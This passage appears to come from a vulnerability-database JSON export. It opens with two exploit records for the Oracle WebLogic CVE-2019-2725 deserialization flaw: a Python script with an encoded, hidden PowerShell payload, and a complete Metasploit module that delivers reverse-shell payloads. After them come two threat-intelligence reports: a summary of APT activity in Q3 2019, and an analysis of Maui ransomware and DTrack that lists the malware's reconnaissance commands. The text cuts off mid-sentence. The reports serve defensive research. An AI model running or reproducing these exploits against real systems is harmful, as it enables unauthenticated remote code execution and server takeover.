AOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==\"\r\n\r\nurl = sys.argv[1]\r\n\r\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\r\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\r\nresponse = requests.post(url, headers=request_headers, data=data)\r\nprint \"status_code:%s\" % str(response.status_code)\r\nprint(response)\n\n# 0day.today [2019-05-01] #", "sourceHref": "https://0day.today/exploit/32626", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-06-22T19:33:15", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-07T00:00:00", "type": "zdt", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "1337DAY-ID-32663", "href": "https://0day.today/exploit/description/32663", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']\n ],\n 'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => 'Apr 23 2019'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),\n OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(datastore['WSPATH']),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status(\"Generating payload...\")\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << %Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n uri = normalize_uri(datastore['WSPATH'])\n if uri.nil?\n datastore['URIPATH'] = \"http://#{RHOST}:#{RPORT}/\"\n end\n\n print_status(\"Sending payload...\")\n\n begin\n res = send_request_cgi(\n 'uri' => uri,\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32663", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in\n\nBangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the 